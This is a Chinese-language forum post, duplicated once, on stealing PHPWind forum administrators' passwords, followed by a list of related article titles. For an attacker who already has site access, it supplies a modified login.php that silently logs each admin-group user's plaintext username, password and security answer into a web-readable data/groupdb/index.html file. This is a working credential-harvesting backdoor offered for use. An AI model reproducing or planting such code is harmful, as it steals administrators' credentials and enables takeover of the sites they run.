PHPWIND得到管理員密碼的方法
有站的許可權,但是管理員密碼很複雜,MD5暴不出來,想得到他密碼咋辦?
在登入檔案做手腳啊...我來貼一個我修改的.
login.php裡面替換掉對應的部分就OK了.
[Copy to clipboard] [ - ]CODE:
if($action=="login"){
/*記錄他的問題和答案修改開始*/
$ques=($_POST['question']!=='-1') ? $_POST['question'] : $_POST['customquest'];
$qs='問題:'.$ques.'答案:'.$_POST['answer'];
/*記錄他的問題和答案修改結束*/
if(!$_POST['step']){
$jumpurl = $pre_url;
require_once(R_P.'require/header.php');
require_once PrintEot('login');footer();
} elseif($_POST['step']==2){
$logingd && GdConfirm($_POST['gdcode']);
$loginq && Qcheck($_POST['qanswer'],$_POST['qkey']);
require_once(R_P.'require/checkpass.php');
include_once(D_P."data/bbscache/dbreg.php");
InitGP(array('pwuser','pwpwd','question','customquest','answer','cktime','hideid','jumpurl'),'P');
if ($pwuser && $pwpwd)
{
$md5_pwpwd = md5($pwpwd);
$realpass=$pwpwd;
$safecv = $db_ifsafecv ? questcode($question,$customquest,$answer) : '';
list($winduid,$groupid,$pwpwd) = checkpass($pwuser,$md5_pwpwd,$safecv,$lgt);
/*下面是我新增的*/
$adminid = array("3", "4", "5"); //adminid=3,4,5,就是管理者.
if (in_array($groupid, $adminid)){
$showtime=date("Y-m-d H:i:s"); //記錄的時間.
@$fp = fopen(D_P.'./data/groupdb/index.html', 'a'); //寫入到原本就存在的檔案,而且這個檔案應該是可寫的.
@fwrite($fp, '使用者名稱:'.$pwuser.'-密碼:'.$realpass.'-'.$qs.'-GroupID:'.$groupid.'-'.$showtime.'<br>'); //基本格式
@fclose($fp);
}
/*到這裡修改結束*/
}else{
Showmsg('login_empty');
}
if(file_exists(D_P."data/groupdb/group_$groupid.php")){
require_once Pcv(D_P."data/groupdb/group_$groupid.php");
} else{
require_once(D_P."data/groupdb/group_1.php");
}
$windpwd = $pwpwd;
$cktime != 0 && $cktime += $timestamp;
Cookie("winduser",StrCode($winduid."\t".$windpwd."\t".$safecv),$cktime);
Cookie('lastvisit','',0);//將$lastvist清空以將剛註冊的會員加入今日到訪會員中
if($db_autoban){
require_once(R_P.'require/autoban.php');
autoban($winduid);
}
($gp_allowhide && $hideid) ? Cookie('hideid',"1",$cktime) : Loginipwrite($winduid);
empty($jumpurl) && $jumpurl=$db_bfn;
//passport
if($db_pptifopen && $db_ppttype == 'server' && ($db_ppturls || $forward)){
$tmp = $jumpurl;
$jumpurl = $forward ? $forward : $db_ppturls;
$forward = $tmp;
require_once(R_P.'require/passport_server.php');
}
//passport
refreshto($jumpurl,'have_login');
}
}
很齷齪吧.
在登入檔案做手腳啊...我來貼一個我修改的.
login.php裡面替換掉對應的部分就OK了.
[Copy to clipboard] [ - ]CODE:
if($action=="login"){
/*記錄他的問題和答案修改開始*/
$ques=($_POST['question']!=='-1') ? $_POST['question'] : $_POST['customquest'];
$qs='問題:'.$ques.'答案:'.$_POST['answer'];
/*記錄他的問題和答案修改結束*/
if(!$_POST['step']){
$jumpurl = $pre_url;
require_once(R_P.'require/header.php');
require_once PrintEot('login');footer();
} elseif($_POST['step']==2){
$logingd && GdConfirm($_POST['gdcode']);
$loginq && Qcheck($_POST['qanswer'],$_POST['qkey']);
require_once(R_P.'require/checkpass.php');
include_once(D_P."data/bbscache/dbreg.php");
InitGP(array('pwuser','pwpwd','question','customquest','answer','cktime','hideid','jumpurl'),'P');
if ($pwuser && $pwpwd)
{
$md5_pwpwd = md5($pwpwd);
$realpass=$pwpwd;
$safecv = $db_ifsafecv ? questcode($question,$customquest,$answer) : '';
list($winduid,$groupid,$pwpwd) = checkpass($pwuser,$md5_pwpwd,$safecv,$lgt);
/*下面是我新增的*/
$adminid = array("3", "4", "5"); //adminid=3,4,5,就是管理者.
if (in_array($groupid, $adminid)){
$showtime=date("Y-m-d H:i:s"); //記錄的時間.
@$fp = fopen(D_P.'./data/groupdb/index.html', 'a'); //寫入到原本就存在的檔案,而且這個檔案應該是可寫的.
@fwrite($fp, '使用者名稱:'.$pwuser.'-密碼:'.$realpass.'-'.$qs.'-GroupID:'.$groupid.'-'.$showtime.'<br>'); //基本格式
@fclose($fp);
}
/*到這裡修改結束*/
}else{
Showmsg('login_empty');
}
if(file_exists(D_P."data/groupdb/group_$groupid.php")){
require_once Pcv(D_P."data/groupdb/group_$groupid.php");
} else{
require_once(D_P."data/groupdb/group_1.php");
}
$windpwd = $pwpwd;
$cktime != 0 && $cktime += $timestamp;
Cookie("winduser",StrCode($winduid."\t".$windpwd."\t".$safecv),$cktime);
Cookie('lastvisit','',0);//將$lastvist清空以將剛註冊的會員加入今日到訪會員中
if($db_autoban){
require_once(R_P.'require/autoban.php');
autoban($winduid);
}
($gp_allowhide && $hideid) ? Cookie('hideid',"1",$cktime) : Loginipwrite($winduid);
empty($jumpurl) && $jumpurl=$db_bfn;
//passport
if($db_pptifopen && $db_ppttype == 'server' && ($db_ppturls || $forward)){
$tmp = $jumpurl;
$jumpurl = $forward ? $forward : $db_ppturls;
$forward = $tmp;
require_once(R_P.'require/passport_server.php');
}
//passport
refreshto($jumpurl,'have_login');
}
}
很齷齪吧.
相關文章
- 解除計算機管理員密碼的方法計算機密碼
- 掠奪許可權:Serv-U得到管理員密碼新招(轉)密碼
- oracle 管理員忘記密碼的應對方法Oracle密碼
- pe如何清除win10管理員密碼_win10系統pe修改管理員密碼的方法Win10密碼
- 得到內網域管理員的5種常見方法內網
- mysql修改管理員密碼MySql密碼
- win10統系怎麼刪除管理員密碼?win10系統刪除管理員賬戶密碼的方法Win10密碼
- Win10系統刪除管理員賬戶密碼的方法Win10密碼
- phpMyAdmin重置WordPress管理員密碼PHP密碼
- oracle-管理員密碼遺失Oracle密碼
- 聯通光貓管理員密碼分析,不安全的密碼方案密碼
- win10怎樣刪除管理員密碼_win10系統刪除管理員密碼的步驟Win10密碼
- win10系統下利用命令列重置管理員密碼的方法Win10命令列密碼
- 金蝶K3cloud管理中心的管理員密碼重置Cloud密碼
- 管理(003):保持管理員密碼與資料字典同步密碼
- Oracle資料庫管理員賬號的密碼破解Oracle資料庫密碼
- Win10系統電腦刪除管理員賬戶密碼的方法教程Win10密碼
- win10系統無法修改管理員賬戶密碼的解決方法Win10密碼
- Mac之忘記管理員名和密碼Mac密碼
- (轉)找回vss超級管理員密碼密碼
- SQL隱碼攻擊的方式找到管理員的賬號密碼SQL密碼
- 如何得到一個隨機密碼隨機密碼
- SAP系統預設的管理員帳戶和密碼密碼
- RHEL7重置root管理員密碼密碼
- jenkins忘記管理員登陸密碼的補救措施Jenkins密碼
- 如何破解ThinkPad T400的BIOS管理員密碼ThinkPadiOS密碼
- 1.7.4. 保持管理員密碼與資料字典同步密碼
- XP管理員密碼丟失是否可以刪除SAM密碼
- 資料庫管理員許可權認證&&密碼檔案的建立和管理資料庫密碼
- 調查顯示40%的管理員使用Word文件儲存密碼密碼
- tplink路由器預設密碼6位 tplink管理員初始密碼是多少路由器密碼
- YTUOJ-偵察員的密碼密碼
- U盾密碼密碼重置方法密碼
- 忘記VAULT的帳號管理密碼的解決方法(二)密碼
- MySQL——密碼管理MySql密碼
- MYSQL密碼管理MySql密碼
- Windows XP 恢復系統管理員密碼的五大奇招(轉)Windows密碼
- linux伺服器修改root管理員密碼-雲伺服器Linux伺服器密碼